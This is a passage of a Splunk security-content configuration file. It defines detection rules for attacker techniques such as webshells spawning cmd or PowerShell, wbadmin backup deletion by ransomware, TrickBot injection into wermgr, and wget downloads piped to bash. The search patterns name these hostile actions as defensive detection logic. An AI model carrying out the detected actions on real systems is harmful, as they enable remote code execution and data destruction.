action.escu.modification_date = 2021-10-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Vbscript Execution Using Wscript App - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["FIN7", "Remcos", "AsyncRAT"]
action.risk = 1
action.risk.param._risk_message = Process name $process_name$ with commandline $process$ to execute vbscript
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Vbscript Execution Using Wscript App - Rule
action.correlationsearch.annotations = {"analytic_story": ["FIN7", "Remcos", "AsyncRAT"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects a suspicious wscript command line used to execute VBScript. This technique was seen in several malware families executing a malicious .vbs file using the wscript application. Commonly, .vbs scripts are associated with the cscript process, so this can be a technique to evade parent-child process detections or even some AV script emulation systems.
action.notable.param.rule_title = Vbscript Execution Using Wscript App
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "wscript.exe" AND Processes.parent_process = "*//e:vbscript*") OR (Processes.process_name = "wscript.exe" AND Processes.process = "*//e:vbscript*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `vbscript_execution_using_wscript_app_filter`

[ESCU - Verclsid CLSID Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects possible abuse of verclsid to execute a malicious file through a generated CLSID. This process is a normal Windows application used to verify a CLSID COM object before it is instantiated by Windows Explorer. This hunting query can be a good pivot point to analyze what the CLSID or COM object points to, to check whether it is a valid application or not.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.012", "T1218"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects possible abuse of verclsid to execute a malicious file through a generated CLSID. This process is a normal Windows application used to verify a CLSID COM object before it is instantiated by Windows Explorer. This hunting query can be a good pivot point to analyze what the CLSID or COM object points to, to check whether it is a valid application or not.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Windows can use this application for its normal COM object validation.
action.escu.creation_date = 2021-09-29
action.escu.modification_date = 2021-09-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - Verclsid CLSID Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Unusual Processes"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Verclsid CLSID Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.012", "T1218"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_verclsid` AND Processes.process="*/S*" Processes.process="*/C*" AND Processes.process="*{*" AND Processes.process="*}*" by Processes.process_name Processes.original_file_name Processes.dest Processes.user Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `verclsid_clsid_execution_filter`

[ESCU - W3WP Spawning Shell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel processes and child processes that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1505", "T1505.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel processes and child processes that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Baseline your environment before production. It is possible build systems using IIS will spawn cmd.exe to perform a software build. Filter as needed.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - W3WP Spawning Shell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["ProxyNotShell", "Data Destruction", "ProxyShell", "Hermetic Wiper", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", "CISA AA22-264A", "Flax Typhoon", "WS FTP Server Critical Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Possible Web Shell execution on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - W3WP Spawning Shell - Rule
action.correlationsearch.annotations = {"analytic_story": ["ProxyNotShell", "Data Destruction", "ProxyShell", "Hermetic Wiper", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", "CISA AA22-264A", "Flax Typhoon", "WS FTP Server Critical Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2021-34473", "CVE-2021-34523", "CVE-2021-31207"], "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1505", "T1505.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel processes and child processes that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.
action.notable.param.rule_title = W3WP Spawning Shell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=w3wp.exe AND (`process_cmd` OR `process_powershell`) by Processes.dest Processes.parent_process Processes.original_file_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `w3wp_spawning_shell_filter`

[ESCU - WBAdmin Delete System Backups - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for flags passed to wbadmin.exe (Windows Backup Administrator Tool) that delete backup files. This is typically used by ransomware to prevent recovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for flags passed to wbadmin.exe (Windows Backup Administrator Tool) that delete backup files. This is typically used by ransomware to prevent recovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may modify the boot configuration.
action.escu.creation_date = 2021-01-22 action.escu.modification_date = 2021-01-22 action.escu.confidence = high action.escu.full_search_name = ESCU - WBAdmin Delete System Backups - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ryuk Ransomware", "Ransomware", "Prestige Ransomware", "Chaos Ransomware"] action.risk = 1 action.risk.param._risk_message = System backup deletion on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - WBAdmin Delete System Backups - Rule action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware", "Ransomware", "Prestige Ransomware", "Chaos Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for flags passed to wbadmin.exe (Windows Backup Administrator Tool) that delete backup files. This is typically used by ransomware to prevent recovery. 
action.notable.param.rule_title = WBAdmin Delete System Backups action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wbadmin.exe Processes.process="*delete*" AND (Processes.process="*catalog*" OR Processes.process="*systemstatebackup*") by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `wbadmin_delete_system_backups_filter` [ESCU - Wbemprox COM Object Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a potentially suspicious process loading a COM object from wbemprox.dll or fastprox.dll. The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. This feature is abused by threat actors and red teamers alike for privilege escalation and to evade detection. This TTP is a good indicator that a process outside the usual WMI host processes and system paths is loading DLLs known to expose WMI COM objects. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a potentially suspicious process loading a COM object from wbemprox.dll or fastprox.dll. The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. 
This feature is abused by threat actors and red teamers alike for privilege escalation and to evade detection. This TTP is a good indicator that a process outside the usual WMI host processes and system paths is loading DLLs known to expose WMI COM objects. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and image load (ImageLoaded) events from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Legitimate processes that are not in the exclusion list may trigger this event. action.escu.creation_date = 2021-06-02 action.escu.modification_date = 2021-06-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Wbemprox COM Object Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = Suspicious COM Object Execution on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wbemprox COM Object Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a potentially suspicious 
process loading a COM object from wbemprox.dll or fastprox.dll. The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. This feature is abused by threat actors and red teamers alike for privilege escalation and to evade detection. This TTP is a good indicator that a process outside the usual WMI host processes and system paths is loading DLLs known to expose WMI COM objects. action.notable.param.rule_title = Wbemprox COM Object Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded IN ("*\\fastprox.dll", "*\\wbemprox.dll", "*\\wbemcomn.dll") NOT (process_name IN ("wmiprvse.exe", "WmiApSrv.exe", "unsecapp.exe")) NOT(Image IN("*\\windows\\*","*\\program files*", "*\\wbem\\*")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name dest EventCode Signed ProcessId Hashes IMPHASH | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wbemprox_com_object_execution_filter` [ESCU - Wermgr Process Connecting To IP Check Web Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is designed to detect a suspicious wermgr.exe process that tries to connect to well-known IP lookup web services. TrickBot and other spy trojans use this technique to reconnoiter the infected machine and learn its public IP address without leaving much of a fingerprint on the process command line. Since wermgr.exe is the Windows Error Reporting manager, it is highly suspicious for this process to contact IP lookup web services; it usually indicates malicious code injected into wermgr.exe. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1590", "T1590.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is designed to detect a suspicious wermgr.exe process that tries to connect to well-known IP lookup web services. TrickBot and other spy trojans use this technique to reconnoiter the infected machine and learn its public IP address without leaving much of a fingerprint on the process command line. Since wermgr.exe is the Windows Error Reporting manager, it is highly suspicious for this process to contact IP lookup web services; it usually indicates malicious code injected into wermgr.exe. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, DNS query name, process path and query status from your endpoints, such as Sysmon EventCode 22. If you are using Sysmon, you must have at least version 12 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-06-01 action.escu.modification_date = 2022-06-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Wermgr Process Connecting To IP Check Web Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Trickbot"] action.risk = 1 action.risk.param._risk_message = Wermgr.exe process connecting to IP location web services on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wermgr Process Connecting To IP Check Web Services - Rule 
action.correlationsearch.annotations = {"analytic_story": ["Trickbot"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1590", "T1590.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is designed to detect a suspicious wermgr.exe process that tries to connect to well-known IP lookup web services. TrickBot and other spy trojans use this technique to reconnoiter the infected machine and learn its public IP address without leaving much of a fingerprint on the process command line. Since wermgr.exe is the Windows Error Reporting manager, it is highly suspicious for this process to contact IP lookup web services; it usually indicates malicious code injected into wermgr.exe. action.notable.param.rule_title = Wermgr Process Connecting To IP Check Web Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=22 process_name=wermgr.exe QueryName IN ("*wtfismyip.com", "*checkip.amazonaws.com", "*ipecho.net", "*ipinfo.io", "*api.ipify.org", "*icanhazip.com", "*ip.anysrc.com","*api.ip.sb", "ident.me", "www.myexternalip.com", "*zen.spamhaus.org", "*cbl.abuseat.org", "*b.barracudacentral.org","*dnsbl-1.uceprotect.net", "*spam.dnsbl.sorbs.net") | stats min(_time) as firstTime max(_time) as lastTime count by Image process_name ProcessId QueryName QueryStatus QueryResults EventCode Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_connecting_to_ip_check_web_services_filter` [ESCU - Wermgr Process Create Executable File - Rule] action.escu = 0 action.escu.enabled = 1 description = This search 
is designed to detect a potentially malicious wermgr.exe process that drops or creates an executable file. Since wermgr.exe is an application triggered when a process encounters an error, it is very unusual for this process to drop executable files. This technique is commonly seen in TrickBot, which injects code into this process to carry out malicious behavior such as downloading additional payloads. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is designed to detect a potentially malicious wermgr.exe process that drops or creates an executable file. Since wermgr.exe is an application triggered when a process encounters an error, it is very unusual for this process to drop executable files. This technique is commonly seen in TrickBot, which injects code into this process to carry out malicious behavior such as downloading additional payloads. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and file creation events (Sysmon EventCode 11 with TargetFilename) from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known legitimate instances of wermgr.exe as needed. 
action.escu.known_false_positives = unknown action.escu.creation_date = 2021-04-19 action.escu.modification_date = 2021-04-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Wermgr Process Create Executable File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Trickbot"] action.risk = 1 action.risk.param._risk_message = Wermgr.exe writing executable files on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wermgr Process Create Executable File - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is designed to detect a potentially malicious wermgr.exe process that drops or creates an executable file. Since wermgr.exe is an application triggered when a process encounters an error, it is very unusual for this process to drop executable files. 
This technique is commonly seen in TrickBot, which injects code into this process to carry out malicious behavior such as downloading additional payloads. action.notable.param.rule_title = Wermgr Process Create Executable File action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=11 process_name = "wermgr.exe" TargetFilename = "*.exe" | stats min(_time) as firstTime max(_time) as lastTime count by Image TargetFilename process_name dest EventCode ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_create_executable_file_filter` [ESCU - Wermgr Process Spawned CMD Or Powershell Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is designed to detect suspicious cmd and powershell processes spawned by the wermgr.exe process. This behavior is commonly seen in code injection techniques, such as those used by TrickBot, to execute shellcode or DLL modules that perform malicious actions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is designed to detect suspicious cmd and powershell processes spawned by the wermgr.exe process. This behavior is commonly seen in code injection techniques, such as those used by TrickBot, to execute shellcode or DLL modules that perform malicious actions. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-04-19 action.escu.modification_date = 2021-04-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Wermgr Process Spawned CMD Or Powershell Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trickbot", "Qakbot"] action.risk = 1 action.risk.param._risk_message = Wermgr.exe spawning suspicious processes on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wermgr Process Spawned CMD Or Powershell Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "Qakbot"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is designed to detect suspicious cmd and powershell processes spawned by the wermgr.exe 
process. This behavior is commonly seen in code injection techniques, such as those used by TrickBot, to execute shellcode or DLL modules that perform malicious actions. action.notable.param.rule_title = Wermgr Process Spawned CMD Or Powershell Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as cmdline min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name = "wermgr.exe" (`process_cmd` OR `process_powershell`) by Processes.parent_process_name Processes.original_file_name Processes.parent_process_id Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_spawned_cmd_or_powershell_process_filter` [ESCU - Wget Download and Bash Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of wget on Linux or macOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of wget on Linux or macOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited; however, filtering may be required. action.escu.creation_date = 2021-12-11 action.escu.modification_date = 2021-12-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Wget Download and Bash Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ingress Tool Transfer", "Log4Shell CVE-2021-44228"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ attempting to download a remote file and run it with bash. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Wget Download and Bash Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "Log4Shell CVE-2021-44228"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of wget on Linux or macOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. 
action.notable.param.rule_title = Wget Download and Bash Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wget AND (((Processes.process="*-q *" OR Processes.process="*--quiet*") AND Processes.process="*-O- *") OR (Processes.process="*|*" AND Processes.process="*bash*")) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wget_download_and_bash_execution_filter` [ESCU - Windows Abused Web Services - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a suspicious process making a DNS query to known, abused web services: text-paste sites, VoIP and instant messaging platforms, secure tunneling services, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware authors, and red teams to download a malicious file onto the target host, and is a good TTP indicator for possible initial access. False positives are expected where these instant messaging or paste services, or common applications such as Telegram or Discord, are allowed in the corporate network. 
